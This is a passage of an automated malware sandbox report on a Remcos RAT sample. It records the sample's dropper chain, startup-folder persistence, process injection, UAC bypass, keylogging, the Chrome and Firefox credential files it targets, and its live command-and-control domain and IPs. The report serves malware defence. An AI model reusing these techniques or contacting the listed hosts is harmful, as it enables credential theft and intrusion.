          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00171201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00171201
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00152BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00152BA5
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0017B226 SendInput,keybd_event,0_2_0017B226
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_001922DA
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\GVV.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe" Jump to behavior
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00170B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00170B62
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00171663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00171663
          Source: GVV.exe, deblaterate.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: svchost.exe, 00000005.00000002.4072003934.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4490748078.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4490784851.0000000002E31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: GVV.exe, deblaterate.exeBinary or memory string: Shell_TrayWnd
          Source: svchost.exe, 0000000F.00000002.4490748078.0000000002E12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerOS\
          Source: svchost.exe, 0000000F.00000002.4490748078.0000000002E12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yuahdgbceja.sytes.net:2766:1Program Managerhttp://geoplugin.net/json.gp
          Source: svchost.exe, 0000000F.00000002.4490748078.0000000002E12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerOS\cf
          Source: svchost.exe, 00000005.00000002.4072031610.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.4072003934.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4490748078.0000000002E12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
          Source: svchost.exe, 00000005.00000002.4072003934.0000000002C12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LRPC-8bd2641bc1c3c300cfProgram Manager1oftware
          Source: svchost.exe, 00000005.00000002.4072031610.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.4072031610.0000000002C65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4490805278.0000000002E54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00130698 cpuid 0_2_00130698
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,5_2_0040F8D1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,5_2_00452036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_004520C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,5_2_00452313
          Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,5_2_00448404
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_0045243C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,5_2_00452543
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_00452610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,5_2_004488ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_00451CD8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,5_2_00451F50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,5_2_00451F9B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,15_2_0040F8D1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,15_2_00452036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_004520C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,15_2_00452313
          Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,15_2_00448404
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_0045243C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,15_2_00452543
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_00452610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,15_2_004488ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,15_2_00451CD8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,15_2_00451F50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,15_2_00451F9B
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00188195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00188195
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0016D27A GetUserNameW,0_2_0016D27A
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0014B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0014B952
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001142DE
          Source: C:\Users\user\Desktop\GVV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
          Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 5276, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2248, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 1136, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 592, type: MEMORYSTR
          Contains functionality to steal Chrome passwords or cookies
          Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data5_2_0040BA12
          Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data15_2_0040BA12
          Contains functionality to steal Firefox passwords or cookies
          Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\5_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: \key3.db5_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\15_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: \key3.db15_2_0040BB30
          Source: deblaterate.exeBinary or memory string: WIN_81
          Source: deblaterate.exeBinary or memory string: WIN_XP
          Source: deblaterate.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: deblaterate.exeBinary or memory string: WIN_XPe
          Source: deblaterate.exeBinary or memory string: WIN_VISTA
          Source: deblaterate.exeBinary or memory string: WIN_7
          Source: deblaterate.exeBinary or memory string: WIN_8

          Remote Access Functionality

          barindex
          Detected Remcos RAT
          Source: C:\Windows\SysWOW64\svchost.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-E70NOSJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-E70NOSJump to behavior
          Yara detected Remcos RAT
          Source: Yara matchFile source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 5276, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2248, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 1136, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 592, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\svchost.exeCode function: cmd.exe5_2_0040569A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: cmd.exe15_2_0040569A
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00191204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00191204
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00191806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00191806
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004F1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,4_2_004F1204
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004F1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,4_2_004F1806

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information111
          Scripting          		2
          Valid Accounts          		1
          Native API          		111
          Scripting          		1
          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		2
          System Time Discovery          		Remote Services11
          Archive Collected Data          		12
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Command and Scripting Interpreter          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		221
          Input Capture          		1
          Account Discovery          		Remote Desktop Protocol221
          Input Capture          		2
          Encrypted Channel          		Exfiltration Over Bluetooth1
          Defacement
          Email AddressesDNS ServerDomain Accounts2
          Service Execution          		2
          Valid Accounts          		1
          Bypass User Account Control          		2
          Obfuscated Files or Information          		2
          Credentials In Files          		1
          System Service Discovery          		SMB/Windows Admin Shares3
          Clipboard Data          		1
          Non-Standard Port          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCron1
          Windows Service          		2
          Valid Accounts          		1
          DLL Side-Loading          		NTDS3
          File and Directory Discovery          		Distributed Component Object ModelInput Capture1
          Remote Access Software          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchd2
          Registry Run Keys / Startup Folder          		21
          Access Token Manipulation          		1
          Bypass User Account Control          		LSA Secrets26
          System Information Discovery          		SSHKeylogging2
          Non-Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
          Windows Service          		1
          Masquerading          		Cached Domain Credentials141
          Security Software Discovery          		VNCGUI Input Capture12
          Application Layer Protocol          		Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items322
          Process Injection          		2
          Valid Accounts          		DCSync12
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job2
          Registry Run Keys / Startup Folder          		12
          Virtualization/Sandbox Evasion          		Proc Filesystem2
          Process Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
          Access Token Manipulation          		/etc/passwd and /etc/shadow1
          Application Window Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron322
          Process Injection          		Network Sniffing1
          System Owner/User Discovery          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435345 Sample: GVV.exe Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 35 yuahdgbceja.sytes.net 2->35 37 geoplugin.net 2->37 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Antivirus detection for URL or domain 2->59 61 9 other signatures 2->61 9 GVV.exe 6 2->9         started        13 wscript.exe 1 2->13         started        signatures3 process4 file5 31 C:\Users\user\AppData\...\deblaterate.exe, PE32 9->31 dropped 75 Binary is likely a compiled AutoIt script file 9->75 77 Found API chain indicative of sandbox detection 9->77 15 deblaterate.exe 3 9->15         started        79 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->79 19 deblaterate.exe 2 13->19         started        signatures6 process7 file8 33 C:\Users\user\AppData\...\deblaterate.vbs, data 15->33 dropped 43 Binary is likely a compiled AutoIt script file 15->43 45 Machine Learning detection for dropped file 15->45 47 Drops VBS files to the startup folder 15->47 49 Found API chain indicative of sandbox detection 15->49 21 svchost.exe 3 14 15->21         started        51 Writes to foreign memory regions 19->51 53 Maps a DLL or memory area into another process 19->53 25 svchost.exe 12 19->25         started        signatures9 process10 dnsIp11 39 geoplugin.net 178.237.33.50, 49709, 49717, 80 ATOM86-ASATOM86NL Netherlands 21->39 41 yuahdgbceja.sytes.net 23.94.53.100, 2766, 49707, 49708 AS-COLOCROSSINGUS United States 21->41 63 Contains functionality to bypass UAC (CMSTPLUA) 21->63 65 Detected Remcos RAT 21->65 67 Contains functionalty to change the wallpaper 21->67 73 4 other signatures 21->73 27 WerFault.exe 23 16 21->27         started        29 WerFault.exe 2 16 21->29         started        69 System process connects to network (likely due to code injection or exploit) 25->69 71 Installs a global keyboard hook 25->71 signatures12 process13

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          GVV.exe34%ReversingLabs
          GVV.exe31%VirustotalBrowse
          GVV.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\silvexes\deblaterate.exe100%Joe Sandbox ML

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          yuahdgbceja.sytes.net1%VirustotalBrowse
          geoplugin.net4%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://geoplugin.net/json.gp100%URL Reputationphishing
          http://geoplugin.net/json.gp/C100%URL Reputationphishing
          http://geoplugin.net/json.gp/C100%URL Reputationphishing
          yuahdgbceja.sytes.net0%Avira URL Cloudsafe
          http://geoplugin.net/json.gpal0%Avira URL Cloudsafe
          http://geoplugin.net/json.gpSystem320%Avira URL Cloudsafe
          http://geoplugin.net/json.gpll0%Avira URL Cloudsafe
          http://geoplugin.net/json.gpD60%Avira URL Cloudsafe
          yuahdgbceja.sytes.net1%VirustotalBrowse
          http://geoplugin.net/json.gp~0%Avira URL Cloudsafe
          http://geoplugin.net/json.gpal0%VirustotalBrowse
          http://geoplugin.net/json.gpD60%VirustotalBrowse
          http://geoplugin.net/json.gp~0%VirustotalBrowse
          http://geoplugin.net/json.gpll0%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          yuahdgbceja.sytes.net
          		23.94.53.100
          		truetrueunknown
          geoplugin.net
          		178.237.33.50
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://geoplugin.net/json.gptrue
          • URL Reputation: phishing
          		unknown
          yuahdgbceja.sytes.nettrue
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://geoplugin.net/json.gpalsvchost.exe, 00000005.00000002.4072462611.0000000002C8B000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://upx.sf.netAmcache.hve.9.drfalse
            		high
            http://geoplugin.net/json.gp/Cdeblaterate.exe, 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, deblaterate.exe, 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmptrue
            • URL Reputation: phishing
            • URL Reputation: phishing
            		unknown
            http://geoplugin.net/json.gpSystem32svchost.exe, 00000005.00000002.4072031610.0000000002C31000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://geoplugin.net/json.gpllsvchost.exe, 00000005.00000002.4072031610.0000000002C31000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://geoplugin.net/json.gpD6svchost.exe, 0000000F.00000002.4490784851.0000000002E31000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://geoplugin.net/json.gp~svchost.exe, 0000000F.00000002.4490748078.0000000002E12000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            23.94.53.100
            		yuahdgbceja.sytes.netUnited States
            		36352AS-COLOCROSSINGUStrue
            178.237.33.50
            		geoplugin.netNetherlands
            		8455ATOM86-ASATOM86NLtrue

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1435345
            Start date and time:2024-05-02 15:06:07 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 10m 8s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:17
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:GVV.exe
            Detection:MAL
            Classification:mal100.rans.troj.spyw.expl.evad.winEXE@12/21@2/2
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 99%
            • Number of executed functions: 50
            • Number of non-executed functions: 303
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240s for sample files taking high CPU consumption

            Warnings

            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 20.42.73.29
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            15:09:57AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs
            15:10:04API Interceptor2x Sleep call for process: WerFault.exe modified
            15:10:51API Interceptor6x Sleep call for process: svchost.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            23.94.53.100202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
              178.237.33.50INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
              • geoplugin.net/json.gp
              202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
              • geoplugin.net/json.gp
              nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              bYPQHxUNMF.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              doc.batGet hashmaliciousGuLoader, RemcosBrowse
              • geoplugin.net/json.gp
              New Order.xla.xlsxGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              yuahdgbceja.sytes.net202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
              • 23.94.53.100
              geoplugin.netINQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
              • 178.237.33.50
              202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
              • 178.237.33.50
              nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
              • 178.237.33.50
